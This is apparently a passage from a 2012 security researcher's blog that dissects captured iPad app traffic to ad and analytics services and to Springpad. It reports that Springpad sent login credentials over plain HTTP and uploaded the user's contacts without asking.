GET /connect?country_code=US&device_type=iPad&app_id=f36e2903-2dde-4864-bb50-5c95f4b8de48&plugin=native&os_version=5.1.1&library_version=8.1.8&language_code=en&lad=0&timestamp=1342284068&sdk_type=connect&platform=iOS&mac_address=d8306270d8f7&display_multiplier=1.000000&app_version=4.0.1&verifier=23819c8dfaeac7ace55cc829e745d28da04d85443cea20e789799dbe1af50964 HTTP/1.1

Host: ws.tapjoyads.com

User-Agent: Bible/4.0.1 CFNetwork/548.1.4 Darwin/11.0.0

Accept-Language: en-us

Accept-Encoding: gzip, deflate

Connection: keep-alive

Proxy-Connection: keep-alive

From these two requests, we can see that it transmits:

A country code
Device type
Application ID
OS version
A library version
Language
Timestamp
Mac Address
Display multiplier
Application version
A verification value

2o7
2o7 is an “online marketing and web analytics business unit owned by Adobe Systems”. All communication takes place over HTTPS, and was used by 6 applications tested

GET /b/ss/twciipadmax/0/OIP-2.1/s60520082?AQB=1&ndh=1&t=14/6/2012%2011%3A28%3A8%206%20420&vid=D8637969-7EE5-4CEC-8117-13F84BC2E686&ce=UTF-8&pageName=%28null%29/185418&cc=USD&events=event5&c4=Mozilla/5.0%20%28iPad%3B%20U%3B%20CPU%20iPhone%20OS%205_1_1%20like%20Mac%20OS%20X%3B%20en-US%29%20%28null%29/185418&c5=iPad&c6=ads_y&c7=iPad&c8=IOS-5.1.1&c9=iPadMax3.3.0&c10=en_US&c12=11%3A00AM&c13=Sat&c14=Weekend&c25=Landscape&v7=iPad&s=768x1024&c=24&AQE=1 HTTP/1.1
Host: twci.112.2o7.net
User-Agent: Mozilla/5.0 (iPad; U; CPU iPhone OS 5_1_1 like Mac OS X; en-US) (null)/185418
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

GET /b/ss/twciipadmax/0/OIP-2.1/s60520082?AQB=1&ndh=1&t=14/6/2012%2011%3A28%3A8%206%20420&vid=D8637969-7EE5-4CEC-8117-13F84BC2E686&ce=UTF-8&pageName=%28null%29/185418&cc=USD&events=event5&c4=Mozilla/5.0%20%28iPad%3B%20U%3B%20CPU%20iPhone%20OS%205_1_1%20like%20Mac%20OS%20X%3B%20en-US%29%20%28null%29/185418&c5=iPad&c6=ads_y&c7=iPad&c8=IOS-5.1.1&c9=iPadMax3.3.0&c10=en_US&c12=11%3A00AM&c13=Sat&c14=Weekend&c25=Landscape&v7=iPad&s=768x1024&c=24&AQE=1 HTTP/1.1

Host: twci.112.2o7.net

User-Agent: Mozilla/5.0 (iPad; U; CPU iPhone OS 5_1_1 like Mac OS X; en-US) (null)/185418

Accept-Language: en-us

Accept-Encoding: gzip, deflate

Connection: keep-alive

Proxy-Connection: keep-alive

GET /b/ss/cccorporate09/0/OIP-2.1.3/s12969427?AQB=1&ndh=1&t=14/6/2012%208%3A26%3A36%206%20420&vid=de5381e09b10d93043b50f43153f3aeeb4dcc589&ce=UTF-8&pageName=ihr%3Aipad%3Alogin&cc=USD&c3=login&c6=IHM-IP&c7=CORPORATE&c8=IHEARTMUSIC&c10=ihr%3Alogin&c11=08%3A26AM&c12=Saturday&c13=Weekend&c25=CORPORATE%3AIHM-IP%3AIHEARTMUSIC&c26=CORPORATE%3AIHM-IP%3Alogin&c27=CORPORATE%3AIHM-IP%3AIHEARTMUSIC%20-%20ihr%3Alogin&c36=ipad&c49=no-auth&h1=IHM-IP%2CCORPORATE&h2=IHM-IP%2CIHEARTMUSIC&s=768x1024&c=24&AQE=1 HTTP/1.1
Host: clearchannel.122.2o7.net
User-Agent: Mozilla/5.0 (iPad; U; CPU iPhone OS 5_1_1 like Mac OS X; en-US) iHeartRadio/11
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

GET /b/ss/cccorporate09/0/OIP-2.1.3/s12969427?AQB=1&ndh=1&t=14/6/2012%208%3A26%3A36%206%20420&vid=de5381e09b10d93043b50f43153f3aeeb4dcc589&ce=UTF-8&pageName=ihr%3Aipad%3Alogin&cc=USD&c3=login&c6=IHM-IP&c7=CORPORATE&c8=IHEARTMUSIC&c10=ihr%3Alogin&c11=08%3A26AM&c12=Saturday&c13=Weekend&c25=CORPORATE%3AIHM-IP%3AIHEARTMUSIC&c26=CORPORATE%3AIHM-IP%3Alogin&c27=CORPORATE%3AIHM-IP%3AIHEARTMUSIC%20-%20ihr%3Alogin&c36=ipad&c49=no-auth&h1=IHM-IP%2CCORPORATE&h2=IHM-IP%2CIHEARTMUSIC&s=768x1024&c=24&AQE=1 HTTP/1.1

Host: clearchannel.122.2o7.net

User-Agent: Mozilla/5.0 (iPad; U; CPU iPhone OS 5_1_1 like Mac OS X; en-US) iHeartRadio/11

Accept-Language: en-us

Accept-Encoding: gzip, deflate

Connection: keep-alive

Proxy-Connection: keep-alive

GET /b/ss/gpapermobileapp/0/OIP-2.1/s214916?AQB=1&ndh=1&t=14/6/2012%208%3A49%3A12%206%20420&vid=de5381e09b10d93043b50f43153f3aeeb4dcc589&ce=UTF-8&pageName=news%7CHeadlines%7Cindex&c1=iPad1%7C1&c2=5.1.1&c3=Section&c4=news&c5=Headlines&c6=Refresh%20Content&c7=USATODAY%20News%20iPad&c8=2.0.9&c10=2.0.9&c16=Section%20Front&c25=USATODAY%20News%20iPad%20Native%20App&h1=%28null%29%2C%28null%29%2C%28null%29%2C%28null%29&s=768x1024&c=24&AQE=1 HTTP/1.1
Host: gpapermobileapp.112.2o7.net
User-Agent: Mozilla/5.0 (iPad; U; CPU iPhone OS 5_1_1 like Mac OS X; en-US) USA TODAY/2.0.9
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

GET /b/ss/gpapermobileapp/0/OIP-2.1/s214916?AQB=1&ndh=1&t=14/6/2012%208%3A49%3A12%206%20420&vid=de5381e09b10d93043b50f43153f3aeeb4dcc589&ce=UTF-8&pageName=news%7CHeadlines%7Cindex&c1=iPad1%7C1&c2=5.1.1&c3=Section&c4=news&c5=Headlines&c6=Refresh%20Content&c7=USATODAY%20News%20iPad&c8=2.0.9&c10=2.0.9&c16=Section%20Front&c25=USATODAY%20News%20iPad%20Native%20App&h1=%28null%29%2C%28null%29%2C%28null%29%2C%28null%29&s=768x1024&c=24&AQE=1 HTTP/1.1

Host: gpapermobileapp.112.2o7.net

User-Agent: Mozilla/5.0 (iPad; U; CPU iPhone OS 5_1_1 like Mac OS X; en-US) USA TODAY/2.0.9

Accept-Language: en-us

Accept-Encoding: gzip, deflate

Connection: keep-alive

Proxy-Connection: keep-alive

These are the items that the request contains:

The local time
VID, an unique identifier
Device type and model
OS version
Locale
Day of the week
Time of week (In this case, weekend)
Screen orientation
Screen resolution

ChartBoost
ChartBoost is a system for cross-promoting applications, used by 5 of the tested applications. They are basically another marketing network. They make a request on first start over HTTPS, which looks like:

POST /api/install.json HTTP/1.1
Host: www.chartboost.com
User-Agent: csr4c3/1.0.6 CFNetwork/548.1.4 Darwin/11.0.0
Content-Length: 187
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

sdk=2.7&os=5.1.1&uuid=de5381e09b10d93043b50f43153f3aeeb4dcc589&app=4f59f403f776596744000096&ui=1&signature=523bd07e23fb71b161bc81c0fa6b7482&country=US&bundle=1.0.6&language=en&model=iPad&

POST /api/install.json HTTP/1.1

Host: www.chartboost.com

User-Agent: csr4c3/1.0.6 CFNetwork/548.1.4 Darwin/11.0.0

Content-Length: 187

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Accept-Language: en-us

Accept-Encoding: gzip, deflate

Connection: keep-alive

Proxy-Connection: keep-alive

sdk=2.7&os=5.1.1&uuid=de5381e09b10d93043b50f43153f3aeeb4dcc589&app=4f59f403f776596744000096&ui=1&signature=523bd07e23fb71b161bc81c0fa6b7482&country=US&bundle=1.0.6&language=en&model=iPad&

POST /api/get.json HTTP/1.1
Host: www.chartboost.com
User-Agent: sandbox/1.04 CFNetwork/548.1.4 Darwin/11.0.0
Content-Length: 445
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

bundle=1.04&location=Default&language=en&identity=6c000000027575696400290000006465353338316530396231306439333034336235306634333135336633616565623464636335383900026d616369640029000000326665656666663433616235663136326566616566356631313037636161313134303038623336620000000000001412020006030600656e30d8306270d8&timestamp=909294443&os=5.1.1&ui=1&app=4f71c985f77659be5300008e&sdk=2.9.1&model=iPad&signature=9b6779e3ff5441a916a20d3ba90b9e18&country=US&

POST /api/get.json HTTP/1.1

Host: www.chartboost.com

User-Agent: sandbox/1.04 CFNetwork/548.1.4 Darwin/11.0.0

Content-Length: 445

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Accept-Language: en-us

Accept-Encoding: gzip, deflate

Connection: keep-alive

Proxy-Connection: keep-alive

bundle=1.04&location=Default&language=en&identity=6c000000027575696400290000006465353338316530396231306439333034336235306634333135336633616565623464636335383900026d616369640029000000326665656666663433616235663136326566616566356631313037636161313134303038623336620000000000001412020006030600656e30d8306270d8&timestamp=909294443&os=5.1.1&ui=1&app=4f71c985f77659be5300008e&sdk=2.9.1&model=iPad&signature=9b6779e3ff5441a916a20d3ba90b9e18&country=US&

The interesting thing is that some of the applications sent across an “identity” value. I’ve yet to trace down what that value exactly means yet however.

OS Version
Unique identifier
An identity
Application ID
A signature of some sort
Country
Application version
Device language
Device model

Medialytics
Medialytics is a “rich media ad platform for mobile”. It communicates solely over HTTP, and was used by 5 of the tested applications.

GET /ad?appID=47f98177c49dfd7398138a5a8443e2896c216739&appv=3.3.0&p=1&d=iPad1,1&v=5.1.1&build=2.6.2.0&udid=52d1697ff6a45581e9c8508ddb07d422&lat=0.000000&lon=0.000000&AR=768x1024&SR=768x1024&mcc=&mnc=&c= HTTP/1.1
Host: a2.medialytics.com
User-Agent: TWC-iPad/185418 CFNetwork/548.1.4 Darwin/11.0.0
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

GET /ad?appID=47f98177c49dfd7398138a5a8443e2896c216739&appv=3.3.0&p=1&d=iPad1,1&v=5.1.1&build=2.6.2.0&udid=52d1697ff6a45581e9c8508ddb07d422&lat=0.000000&lon=0.000000&AR=768x1024&SR=768x1024&mcc=&mnc=&c= HTTP/1.1

Host: a2.medialytics.com

User-Agent: TWC-iPad/185418 CFNetwork/548.1.4 Darwin/11.0.0

Accept-Language: en-us

Accept-Encoding: gzip, deflate

Connection: keep-alive

Proxy-Connection: keep-alive

GET /ad?appID=f8b9ae5ebad37d1d974d791fc6f242ce6bb36d4e&appv=1.0&p=1&d=iPad1,1&v=5.1.1&build=2.5.1.0&udid=52d1697ff6a45581e9c8508ddb07d422&lat=0.000000&lon=0.000000&AR=768x1024&SR=768x1024&mcc=&mnc=&c= HTTP/1.1
Host: a.medialytics.com
User-Agent: Epicurious/3.0.3 CFNetwork/548.1.4 Darwin/11.0.0
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

GET /ad?appID=f8b9ae5ebad37d1d974d791fc6f242ce6bb36d4e&appv=1.0&p=1&d=iPad1,1&v=5.1.1&build=2.5.1.0&udid=52d1697ff6a45581e9c8508ddb07d422&lat=0.000000&lon=0.000000&AR=768x1024&SR=768x1024&mcc=&mnc=&c= HTTP/1.1

Host: a.medialytics.com

User-Agent: Epicurious/3.0.3 CFNetwork/548.1.4 Darwin/11.0.0

Accept-Language: en-us

Accept-Encoding: gzip, deflate

Connection: keep-alive

Proxy-Connection: keep-alive

The interesting thing is that it contains parameters for latitude and longitude, as well as mcc, mnc, and c which were empty during my testing. My iPad does not have GPS, which is most likely why this information was missing.

An application ID
Application version
Device type
OS version
Unique identifier
Latitude and Longitude
Screen resolution

Crittercism
Crittercism is a telemetry platform for tracking crashes and performance metrics. It is used by 5 applications which was tested and communicates over HTTPS.

POST /feedback/app_loaded/ HTTP/1.1
Host: api.crittercism.com
User-Agent: MyFitnessPalForIPad/1.3 CFNetwork/548.1.4 Darwin/11.0.0
Content-Length: 402
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

&state={"model":"iPad","system_version":"5.1.1","app_version":"1.3","reported_at":"2012-07-14T13:29:05","system":"iPhone OS","locale":"en_US","platform":"iPad1,1","pirated":0,"enabled_remote_notification_types":"0"}&did=9481c5c74ad9cc3022ce785631ed93be9daf8bea535812c755cba6239ceb650b&device_name=iphone&app_id=4f3d40a9b093152a95000019&key=4f3d40a9b093152a95000019kjk3pgzw&lib_version=3.2.1&is_launch=1

POST /feedback/app_loaded/ HTTP/1.1

Host: api.crittercism.com

User-Agent: MyFitnessPalForIPad/1.3 CFNetwork/548.1.4 Darwin/11.0.0

Content-Length: 402

Content-Type: application/x-www-form-urlencoded

Accept-Language: en-us

Accept-Encoding: gzip, deflate

Connection: keep-alive

Proxy-Connection: keep-alive

&state={"model":"iPad","system_version":"5.1.1","app_version":"1.3","reported_at":"2012-07-14T13:29:05","system":"iPhone OS","locale":"en_US","platform":"iPad1,1","pirated":0,"enabled_remote_notification_types":"0"}&did=9481c5c74ad9cc3022ce785631ed93be9daf8bea535812c755cba6239ceb650b&device_name=iphone&app_id=4f3d40a9b093152a95000019&key=4f3d40a9b093152a95000019kjk3pgzw&lib_version=3.2.1&is_launch=1

POST /feedback/app_loaded/ HTTP/1.1
Host: api.crittercism.com
User-Agent: Magic%20Piano/4.0.4 CFNetwork/548.1.4 Darwin/11.0.0
Content-Length: 405
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

&state={"model":"iPad","system_version":"5.1.1","app_version":"4.0.4","reported_at":"2012-07-14T15:17:24","system":"iPhone OS","locale":"en_US","platform":"iPad1,1","pirated":0,"enabled_remote_notification_types":"0"}&did=927c6f31db4277c921e28e13f9c244ba47711f0bcb4510cde5a21588f5140aebg&device_name=iphone&app_id=4f07112fb093151a9000009a&key=4f07112fb093151a9000009afudrdbxm&lib_version=3.1.5&is_launch=1

POST /feedback/app_loaded/ HTTP/1.1

Host: api.crittercism.com

User-Agent: Magic%20Piano/4.0.4 CFNetwork/548.1.4 Darwin/11.0.0

Content-Length: 405

Content-Type: application/x-www-form-urlencoded

Accept-Language: en-us

Accept-Encoding: gzip, deflate

Connection: keep-alive

Proxy-Connection: keep-alive

&state={"model":"iPad","system_version":"5.1.1","app_version":"4.0.4","reported_at":"2012-07-14T15:17:24","system":"iPhone OS","locale":"en_US","platform":"iPad1,1","pirated":0,"enabled_remote_notification_types":"0"}&did=927c6f31db4277c921e28e13f9c244ba47711f0bcb4510cde5a21588f5140aebg&device_name=iphone&app_id=4f07112fb093151a9000009a&key=4f07112fb093151a9000009afudrdbxm&lib_version=3.1.5&is_launch=1

From the looks of things, it collects:

Device model
OS version
Application version
Timestamp
OS Type
Locale
Device type
If the application was pirated or not
If the application was allowed remote notifications
A unique ID of some sort
Device name
Application ID
A key
Library version
Whether or not the request was sent through an application launch

July 13, 2012 by Charlie Eriksen

Dissecting traffic from SpringPad for iOS

My research over the last couple of months has focused on the security ghetto of WordPress plugins. But recently @arnimarhardar turned me to the subject of mobile applications. As they often use HTTP, I felt right at home. I decided to download a few random applications onto my iPad and then go to town. I personally use my iPhone on a daily basis, so what I’m about to describe to you was quite the eye-opener for me in terms of what sort of data is sent about you to third-parties and such. Let me present to you, an extremely popular application: SpringPad.

Note: I’ve masked out parts of requests since they may contain unique identifiers and such things.

Dissecting Springpad
Armed with my recently acquired copy of Burp Pro, I booted up the application for the very first time. I was greeted with an authentication screen, asking me to sign up. Already at this point, Springpad has contacted a number of very interesting domains. There’s a few calls to Twitter and Facebook and such, but I’ve left those out since they offer no insights into what Springpad does.

https://api.redlaser.com
http://data.flurry.com
http://iphone3.springpad.com
https://ws.tapjoyads.com

Of these 4 requests, only one of them is actually related to the application at all. That seemed very odd to me. So let’s look at what they did in order listed.

Third-party requests

GET /getstatus?key=com.springpadit.springpad&;udid=2B9XXXX8-DXXC-4XXC-8XX8-94AEXXXXDF1A&;platform=ios&;dv=iPad1%2C1&;sdkver=3.3.0build154&;appid=com.springpadit.springpad&;locale=en_US&;appver=3.0.6&;os=5.0.1 HTTP/1.1
Host: api.redlaser.com
User-Agent: Springpad/3.0.6 CFNetwork/548.0.4 Darwin/11.0.0
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

GET /getstatus?key=com.springpadit.springpad&;udid=2B9XXXX8-DXXC-4XXC-8XX8-94AEXXXXDF1A&;platform=ios&;dv=iPad1%2C1&;sdkver=3.3.0build154&;appid=com.springpadit.springpad&;locale=en_US&;appver=3.0.6&;os=5.0.1 HTTP/1.1

Host: api.redlaser.com

User-Agent: Springpad/3.0.6 CFNetwork/548.0.4 Darwin/11.0.0

Accept-Language: en-us

Accept-Encoding: gzip, deflate

Connection: keep-alive

Proxy-Connection: keep-alive

RedLaser is a “RedLaser is a free shopping app for iPhone, Windows Phones, and Android that has been downloaded over 19 million times.”. Ok, interesting. How that is used by a note-taking application is a mystery to me. But from what we can tell from the request, is that they sent the name of the application making the request, an unique identifier, the platform, hardware versions, sdk version, the build number, locale, application version and OS version. Of course, sending across an unique identifier is a bit questionable, given that I as an end-user have no idea what redlaser is, but let’s move on!

POST /aas.do HTTP/1.1
Host: data.flurry.com
User-Agent: Springpad/3.0.6 CFNetwork/548.0.4 Darwin/11.0.0
Content-Length: 307
Content-Type: application/octet-stream
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Pragma: no-cache
Connection: keep-alive
Proxy-Connection: keep-alive

               N  8Dƒ°Ä 9UXXXW5CUIXXXXXHDHSR 3.0.6    .IPHONEde53XXe0XX10d930XXb50f4315XX3aeXX4dXX589  Pq…·j³î•&gt;-ß"›Óì.2‹&gt;  ŽJWÖ"º9†zÍF»{»¾~7p|  &;ID06XX586A-CXX4-4F72-8AXXD-XXXX9CE1B3C63  8Dƒ°¢  8Dƒ°¢  
scr.height 1024 	scr.width 768 device.os.version 5.0.1 device.model.1 iPad1,1  à„

POST /aas.do HTTP/1.1

Host: data.flurry.com

User-Agent: Springpad/3.0.6 CFNetwork/548.0.4 Darwin/11.0.0

Content-Length: 307

Content-Type: application/octet-stream

Accept-Language: en-us

Accept-Encoding: gzip, deflate

Pragma: no-cache

Connection: keep-alive

Proxy-Connection: keep-alive

N 8Dƒ°Ä 9UXXXW5CUIXXXXXHDHSR 3.0.6 .IPHONEde53XXe0XX10d930XXb50f4315XX3aeXX4dXX589 Pq…·j³î•>-ß"›Óì.2‹> ŽJWÖ"º9†zÍF»{»¾~7p| &;ID06XX586A-CXX4-4F72-8AXXD-XXXX9CE1B3C63 8Dƒ°¢ 8Dƒ°¢

scr.height 1024 scr.width 768 device.os.version 5.0.1 device.model.1 iPad1,1 à„

This one is fun, because it seems to be sending across an actual data-structure, null-byte padding and everything. But it’s sending across a couple of (unique) identifiers, resolution, model, and version information. That’s nice. Not only does there seem to be one piece of identifying information in this request like to redlaser, there’s several.

Before getting into the actual request to springpad, we need a last stop over to tapjoyads.com!

GET /connect?sdk_type=connect&;country_code=US&;display_multiplier=1.000000&;plugin=native&;library_version=8.1.8&;app_id=1168c244-ca87-40db-816c-8abd0f1a2144&;lad=0&;mobile_country_code=&;device_type=iPad&;carrier_name=&;language_code=en&;os_version=5.0.1&;verifier=23a213fcfdceb0dd91XXX67a1b136c1e8c9335a2d409f3dXXX1b500495f8834b&;timestamp=1341179277&;allows_voip=yes&;app_version=3.0.6&;mobile_network_code=&;carrier_country_code=&;platform=iOS&;mac_address=d8XX6270XXfX HTTP/1.1
Host: ws.tapjoyads.com
User-Agent: Springpad/3.0.6 CFNetwork/548.0.4 Darwin/11.0.0
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

GET /connect?sdk_type=connect&;country_code=US&;display_multiplier=1.000000&;plugin=native&;library_version=8.1.8&;app_id=1168c244-ca87-40db-816c-8abd0f1a2144&;lad=0&;mobile_country_code=&;device_type=iPad&;carrier_name=&;language_code=en&;os_version=5.0.1&;verifier=23a213fcfdceb0dd91XXX67a1b136c1e8c9335a2d409f3dXXX1b500495f8834b&;timestamp=1341179277&;allows_voip=yes&;app_version=3.0.6&;mobile_network_code=&;carrier_country_code=&;platform=iOS&;mac_address=d8XX6270XXfX HTTP/1.1

Host: ws.tapjoyads.com

User-Agent: Springpad/3.0.6 CFNetwork/548.0.4 Darwin/11.0.0

Accept-Language: en-us

Accept-Encoding: gzip, deflate

Connection: keep-alive

Proxy-Connection: keep-alive

The third request to a third party consists of a lot of fun information, such as country, device type, carrier name, language, iOS version, and your devices’ mac address.

Springpad requests
And now, for the main course, Springpad. Let’s see what it’s got in store for us!

GET /api/ui/layouts HTTP/1.1
Host: iphone3.springpad.com
User-Agent: Springpad/3.0.6 CFNetwork/548.0.4 Darwin/11.0.0
Accept: application/json
Authorization: OAuth realm="", oauth_consumer_key="aXXeb1d3543XX2749XX83f56beXXdb81", oauth_signature_method="PLAINTEXT", oauth_signature="43XX9ffdfb8XX8aea607316XXf3aXXd6%26", oauth_timestamp="1341179279", oauth_nonce="4190XX27-XX12-4XX6-9XX3-CDD9EXXX2FAD", oauth_version="1.0"
Accept-Charset: ISO-8859-1,utf-8
Accept-Encoding: gzip
X-Spring-Client: iPad
X-Spring-Client-Version: 3.06
X-Spring-Api-Version: 9
X-Spring-Device-Identifier: d8XX6270XXfX
Accept-Language: en-us
Pragma: no-cache
Connection: keep-alive
Proxy-Connection: keep-alive

GET /api/ui/layouts HTTP/1.1

Host: iphone3.springpad.com

User-Agent: Springpad/3.0.6 CFNetwork/548.0.4 Darwin/11.0.0

Accept: application/json

Authorization: OAuth realm="", oauth_consumer_key="aXXeb1d3543XX2749XX83f56beXXdb81", oauth_signature_method="PLAINTEXT", oauth_signature="43XX9ffdfb8XX8aea607316XXf3aXXd6%26", oauth_timestamp="1341179279", oauth_nonce="4190XX27-XX12-4XX6-9XX3-CDD9EXXX2FAD", oauth_version="1.0"

Accept-Charset: ISO-8859-1,utf-8

Accept-Encoding: gzip

X-Spring-Client: iPad

X-Spring-Client-Version: 3.06

X-Spring-Api-Version: 9

X-Spring-Device-Identifier: d8XX6270XXfX

Accept-Language: en-us

Pragma: no-cache

Connection: keep-alive

Proxy-Connection: keep-alive

This is the first request it makes, and the very first thing that greeted me was that this communication didn’t go over HTTPS, which is a concern. But onto the request, we see some OAuth fun, and then a device identifier, which is again your mac address. Ok, not the biggest of deals, let’s now sign up!

POST /api/users HTTP/1.1
Host: iphone3.springpad.com
User-Agent: Springpad/3.0.6 CFNetwork/548.0.4 Darwin/11.0.0
Content-Length: 185
Accept: application/json
Authorization: OAuth realm="", oauth_consumer_key="aXXeb1d3543XX2749XX83f56beXXdb81", oauth_signature_method="PLAINTEXT", oauth_signature="43XX9ffdfb8XX8aea607316XXf3aXXd6%26", oauth_timestamp="1341179279", oauth_nonce="4190XX27-XX12-4XX6-9XX3-CDD9EXXX2FAD", oauth_version="1.0"
Content-Type: application/json; charset=UTF-8
Accept-Charset: ISO-8859-1,utf-8
Accept-Encoding: gzip
X-Spring-Client: iPad
X-Spring-Client-Version: 3.06
X-Spring-Api-Version: 9
X-Spring-Device-Identifier: d8XX6270XXfX
Accept-Language: en-us
Cookie: JSESSIONID=E2XX9E4XX6C3CE2494EXX5C382XX3AFB.SPAD_NODE6
Pragma: no-cache
Connection: keep-alive
Proxy-Connection: keep-alive

{"key2":"43XX9ffdfb8XX8aea607316XXf3aXXd6","password":"XXXXXXXXXXXXXXX","source":"ipad","email":"XXXXXXXXXXXX@gmail.com","key1":"aXXeb1d3543XX2749XX83f56beXXdb81","timeZone":"Atlantic/Reykjavik"}

POST /api/users HTTP/1.1

Host: iphone3.springpad.com

User-Agent: Springpad/3.0.6 CFNetwork/548.0.4 Darwin/11.0.0

Content-Length: 185

Accept: application/json

Content-Type: application/json; charset=UTF-8

Accept-Charset: ISO-8859-1,utf-8

Accept-Encoding: gzip

X-Spring-Client: iPad

X-Spring-Client-Version: 3.06

X-Spring-Api-Version: 9

X-Spring-Device-Identifier: d8XX6270XXfX

Accept-Language: en-us

Cookie: JSESSIONID=E2XX9E4XX6C3CE2494EXX5C382XX3AFB.SPAD_NODE6

Pragma: no-cache

Connection: keep-alive

Proxy-Connection: keep-alive

{"key2":"43XX9ffdfb8XX8aea607316XXf3aXXd6","password":"XXXXXXXXXXXXXXX","source":"ipad","email":"XXXXXXXXXXXX@gmail.com","key1":"aXXeb1d3543XX2749XX83f56beXXdb81","timeZone":"Atlantic/Reykjavik"}

At this point, we post our credentials to the site(Over HTTP, mind you. Ooops) with the addition of a sessionID in our cookie. Again we see the transmission of your mac address.

POST /api/users/me/contacts?&;filter=springpad HTTP/1.1
Host: iphone3.springpad.com
User-Agent: Springpad/3.0.6 CFNetwork/548.0.4 Darwin/11.0.0
Content-Length: 45
Accept: application/json
Authorization: OAuth realm="", oauth_consumer_key="aXXeb1d3543XX2749XX83f56beXXdb81", oauth_token="f46939dfffeae3ae50e6e38310140bf2", oauth_signature_method="PLAINTEXT", oauth_signature="43XX9ffdfb8XX8aea607316XXf3aXXd6%26XXfe8b8XXafeecdf55XXecf11adXX5e2", oauth_timestamp="1341185371", oauth_nonce="ADXX06A2-EXXD-4D26-BXXF-XXB9XX36DXX1", oauth_version="1.0"
Content-Type: application/json; charset=UTF-8
Accept-Charset: ISO-8859-1,utf-8
Accept-Encoding: gzip
X-Spring-Client: iPad
X-Spring-Client-Version: 3.06
X-Spring-Api-Version: 9
X-Spring-Device-Identifier: d8XX6270XXfX
Accept-Language: en-us
Cookie: JSESSIONID=E2XX9E4XX6C3CE2494EXX5C382XX3AFB.SPAD_NODE6
Pragma: no-cache
Connection: keep-alive
Proxy-Connection: keep-alive

["M8R-39frht@mailinator.com","M8R-yxpm07@mailinator.com"]

POST /api/users/me/contacts?&;filter=springpad HTTP/1.1

Host: iphone3.springpad.com

User-Agent: Springpad/3.0.6 CFNetwork/548.0.4 Darwin/11.0.0

Content-Length: 45

Accept: application/json

Authorization: OAuth realm="", oauth_consumer_key="aXXeb1d3543XX2749XX83f56beXXdb81", oauth_token="f46939dfffeae3ae50e6e38310140bf2", oauth_signature_method="PLAINTEXT", oauth_signature="43XX9ffdfb8XX8aea607316XXf3aXXd6%26XXfe8b8XXafeecdf55XXecf11adXX5e2", oauth_timestamp="1341185371", oauth_nonce="ADXX06A2-EXXD-4D26-BXXF-XXB9XX36DXX1", oauth_version="1.0"

Content-Type: application/json; charset=UTF-8

Accept-Charset: ISO-8859-1,utf-8

Accept-Encoding: gzip

X-Spring-Client: iPad

X-Spring-Client-Version: 3.06

X-Spring-Api-Version: 9

X-Spring-Device-Identifier: d8XX6270XXfX

Accept-Language: en-us

Cookie: JSESSIONID=E2XX9E4XX6C3CE2494EXX5C382XX3AFB.SPAD_NODE6

Pragma: no-cache

Connection: keep-alive

Proxy-Connection: keep-alive

["M8R-39frht@mailinator.com","M8R-yxpm07@mailinator.com"]

Hold on a minute, what is that being sent across the wire? At this point, all I’ve clicked on is for me to sign up and just finish registration. I’ve not been requested to submit all of my contacts which are stored in my iOS contact list. Huh, that’s odd! I thought maybe I missed something, so I checked again. Nope, I’m not asked if I want to upload this.

The fine-print part of the story
So let’s go consult our privacy policy as for what information the application will automatically upload from me:

Types of Information We Collect

In connection with your use of our Website and our mobile applications, we may collect a variety of information from and about you in different ways.

This includes:

-Information you provide to us such as the information you provide when you register to use our service, give us your contact information, create a profile on our Website, or register to receive newsletters, alerts, or any products or services we provide via our Website or through our mobile applications ("Personal Information").

-Private User Submitted Content ("Private Content") or Public Content (as such terms defined in our Terms of Service) as designated by you.

-Information we collect automatically as you use the Website or our mobile applications, such as your IP address, the referring URL, browser type, and information about your usage of the Website or our mobile applications, whether links to external websites are followed, and whether advertisements provided to you are clicked.

-We use cookies, which are small data files that we send to your browser for storage on your computer's hard drive, to identify you as a user, store your preferences, track activity at our Website and better serve your needs and interests. Cookies can be deleted or blocked by changing the settings on your Web browser, but if you block all cookies, you may not be able to take full advantage of the Springpad services.

Types of Information We Collect

In connection with your use of our Website and our mobile applications, we may collect a variety of information from and about you in different ways.

This includes:

-Information you provide to us such as the information you provide when you register to use our service, give us your contact information, create a profile on our Website, or register to receive newsletters, alerts, or any products or services we provide via our Website or through our mobile applications ("Personal Information").

-Private User Submitted Content ("Private Content") or Public Content (as such terms defined in our Terms of Service) as designated by you.

-Information we collect automatically as you use the Website or our mobile applications, such as your IP address, the referring URL, browser type, and information about your usage of the Website or our mobile applications, whether links to external websites are followed, and whether advertisements provided to you are clicked.

-We use cookies, which are small data files that we send to your browser for storage on your computer's hard drive, to identify you as a user, store your preferences, track activity at our Website and better serve your needs and interests. Cookies can be deleted or blocked by changing the settings on your Web browser, but if you block all cookies, you may not be able to take full advantage of the Springpad services.

Oh, how odd. Not a word about contacts! This isn’t really what I’d expect. There’s another bit of the privacy policy which states:

Accessing Your Personal Information

As a Springpad user, you will have the opportunity to review and modify the information stored in your personal account any time you log onto your Springpad account using an email address and password listed on the account.

Accessing Your Personal Information

As a Springpad user, you will have the opportunity to review and modify the information stored in your personal account any time you log onto your Springpad account using an email address and password listed on the account.

Thinking that I could now log into their web-site and see which information they have obtained from me, I logged in and started reviewing it. To my surprise, not a single mention of contacts was to be found. This is starting to smell. So let’s consult the iOS Application Guidelines as put forward by Apple:

